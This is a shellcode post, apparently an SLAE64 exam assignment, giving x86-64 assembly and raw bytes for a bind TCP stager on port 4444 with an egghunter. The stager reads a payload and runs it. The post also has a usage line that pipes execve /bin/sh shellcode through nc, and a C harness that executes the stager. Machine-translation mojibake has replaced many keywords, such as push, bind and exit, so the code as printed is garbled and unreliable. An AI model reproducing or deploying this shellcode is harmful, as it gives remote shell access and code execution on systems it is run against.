Linux/x86 - ÃùÂ¢½êd TCP stager with egghunter

¤³¤Î¥Ú¡¼¥¸¤ÏEtoJÃà¸ìËÝÌõ¥Õ¥£¥ë¥¿¤Ë¤è¤Ã¤ÆËÝÌõÀ¸À®¤µ¤ì¤Þ¤·¤¿¡£
Linux/x86 - ÃùÂ¢½êd TCP stager with egghunter - 157 bytes
;Exam Assignment 3
;¼Â»Ü of egghunter
;Default egg = "deaddead"                       ;
;If connected the stager check of egg , if ¸½ºß¤Î ¿ë¹Ô¤¹¤ë¡¿È¯¸ú¤µ¤»¤ë the code   ;
;You can send a ºÇÂç¸Â of 255 bytes (egg + code)                     ;
;if no egg , shellcode ½Ð¸ý                                           ;
;Christophe G SLAE64 - 1337                                           ;



Á´À¤³¦¤Î _start

     jmp short _start
    _start_code :
        call rsi

_start:


    ; sock = socket(AF_INET, SOCK_STREAM, 0)
    ; AF_INET = 2
    ; SOCK_STREAM = 1
    ; syscall number 41

    xor rdx , rdx
    ²¡¤·¿Ê¤á¤ë rdx        ; null into the stack 
    ²¡¤·¿Ê¤á¤ë byte 0x29 ; syscall number 41
    pop rax
    ²¡¤·¿Ê¤á¤ë byte 0x2  ; AF_INET
    pop rdi
    ²¡¤·¿Ê¤á¤ë byte 0x1  ; SOCK_STREAM
    pop rsi
    syscall

    ; copy socket descriptor to rdi for Ì¤Íè use
    xchg rax , rdi


    ; server.sin_family = AF_INET
    ; server.sin_port = htons(PORT)
    ; server.sin_addr.s_addr = INADDR_ANY
    ; bzero(&server.sin_zero, 8)

     xor rax, rax

     ²¡¤·¿Ê¤á¤ë rax  ; bzero(&server.sin_zero, 8)


     mov rbx , 0xffffffffa3eefffd    ; move ip ±éÀâ¡Ê¤¹¤ë¡Ë¡¿½»½ê , port 4444 , AF_INET (02) in one »Ø¼¨¡¿¶µ¼ø¡¿¶µ°é (¸ø¼°Ê¸½ñ¡¤Ç§¤á¤ëd to ½üµî¤¹¤ë null of ip ±éÀâ¡Ê¤¹¤ë¡Ë¡¿½»½ê and AF_INET value)


     not rbx
     ²¡¤·¿Ê¤á¤ë rbx
     ²¡¤·¿Ê¤á¤ë rsp  ; save rsp value into the stack , needed for rsi later


    ; ÃùÂ¢½êd(sock, (struct sockaddr *)&server, sockaddr_len)
    ; syscall number 49


    ²¡¤·¿Ê¤á¤ë byte 0x31 ; (49)
    pop rax
    pop rsi        ; retrieve value of rsp  ²¡¤·¿Ê¤á¤ëd into the stack before
    ²¡¤·¿Ê¤á¤ë byte 0x10  ; (16 bytes) sockaddr_len
    pop rdx
    syscall


    ; listen(sock, MAX_CLIENTS)
    ; syscall number 50

    ²¡¤·¿Ê¤á¤ë byte 0x32 ; (50)
    pop rax
    ²¡¤·¿Ê¤á¤ë byte 0x2   ;MAX_CLIENTS

    pop rsi
    syscall


    ; new = ¼õÂ÷¤¹¤ë(sock, (struct sockaddr *)&¡ÊÊÛ¸î»Î¤Î¡Ë°ÍÍê¿Í, &sockaddr_len)
    ; syscall number 43


    ²¡¤·¿Ê¤á¤ë byte 0x2b   ; ¼õÂ÷¤¹¤ë syscall
    pop rax
    sub rsp, 0x10
    ²¡¤·¿Ê¤á¤ë rsp
    pop rsi       ;(struct sockaddr *)&¡ÊÊÛ¸î»Î¤Î¡Ë°ÍÍê¿Í

    ²¡¤·¿Ê¤á¤ë byte 0x10
    ²¡¤·¿Ê¤á¤ë rsp
    pop rdx    ; &sockaddr_len

    syscall

    ; Ãß¤¨¤ë¡¿Å¹ the ¡ÊÊÛ¸î»Î¤Î¡Ë°ÍÍê¿Í socket description
    mov r9, rax

    ; ¤Î¶á¤¯¤Ë parent

    ²¡¤·¿Ê¤á¤ë byte 0x3
    pop rax
    syscall





      xchg rdi , r9   ; ²óÉü¤¹¤ë ¡ÊÊÛ¸î»Î¤Î¡Ë°ÍÍê¿Í socket description to rdi
      xor rsi , rsi

  dup2:
      ²¡¤·¿Ê¤á¤ë byte 0x21
      pop rax       ; duplicate sockets  dup2 (new, old) in this »öÎã¡¿´µ¼Ô (stdin , stdout , stderr); three times ÃèÊÖ¤êÈô¹Ô
      syscall
    inc rsi
    cmp rsi , 0x3  ; go in the next couple of »Ø¼¨¡¿¶µ¼ø¡¿¶µ°é if equals

 loopne dup2

       xor rsi , rsi
       mul rsi
       xor rdi , rdi
       sub spl , 0xff
       mov rsi , rsp
       mov dl , 0xff
       syscall

      Inc_rsi:
         cmp dil , 0xff
         jz ½Ð¸ý
         inc rsi
         inc rdi



      cmp [rsi - 4] , dword 0x64616564                   ; egghunter
      jnz Inc_rsi
      cmp [rsi - 8] , dword 0x64616564
      jnz Inc_rsi
      jz _start_code

      ½Ð¸ý:
         ²¡¤·¿Ê¤á¤ë byte 0x3c
         pop rax
         syscall




------------------------------------------------------------------------------------------------------------------------------------------------

Usage :

    Execve Shellcode 

#(echo -ne "\x68\x85\x11\x47\x02\x64\x65\x61\x64\x64\x65\x61\x64\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43" ; cat) | nc localhost 4444


"x68\x85\x11\x47\x02" -->> dumm bytes

"\x64\x65\x61\x64\x64\x65\x61\x64" -->> egg (deaddead)

"\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10"
"\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff"  -->> shellcode Execve ÆüËÜ¶¦»ºÅÞ 
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42"
"\x42\x43\x43\x43\x43\x43\x43\x43\x43" 

---------------------------------------------------------------------------------------------------------------------------------------------------


Shellcode :

#´Þ¤à <stdio.h>
#´Þ¤à <string.h>

unsigned char stager[] = \
"\xeb\x02\xff\xd6\x48\x31\xd2\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\x31\xc0\x50\x48\xc7\xc3\xfd\xff\xee\xa3\x48\xf7\xd3\x53\x54\x6a\x31\x58\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x02\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10\x54\x5a\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\xe0\xf2\x48\x31\xf6\x48\xf7\xe6\x48\x31\xff\x40\x80\xec\xff\x48\x89\xe6\xb2\xff\x0f\x05\x40\x80\xff\xff\x74\x1e\x48\xff\xc6\x48\xff\xc7\x81\x7e\xfc\x64\x65\x61\x64\x75\xeb\x81\x7e\xf8\x64\x65\x61\x64\x75\xe2\x0f\x84\x6a\xff\xff\xff\x6a\x3c\x58\x0f\x05";

int main()

{

    printf("Stager Length:  %d\n", (int)strlen(stager));


    (*(Ìµ¸ú¤Î  (*)()) stager)();





}